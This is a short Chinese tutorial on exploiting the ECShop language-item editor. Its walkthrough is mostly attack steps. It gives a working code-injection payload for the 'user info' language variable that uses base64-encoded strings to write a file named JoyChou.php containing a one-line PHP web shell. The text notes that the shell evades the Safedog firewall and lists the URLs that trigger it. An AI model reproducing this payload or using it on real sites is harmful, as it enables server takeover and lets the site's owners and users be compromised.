ecshop教程:后台语言项执行漏洞详解
发布时间:12/03 来源: 浏览:
关键词:
该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析
1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索“用户信息”
为什么要搜索“用户信息”,还可以搜索其它的吗?
答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以
2.添加如下后门,将用户信息改为
用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}
即生成一个JoyChou.php文件,内容为(可以过安全狗的一句话哦):
<?phpassert($_POST[x]);?>
3.访问user.php即可产生shell(不用注册登录账户)
http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php或
http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php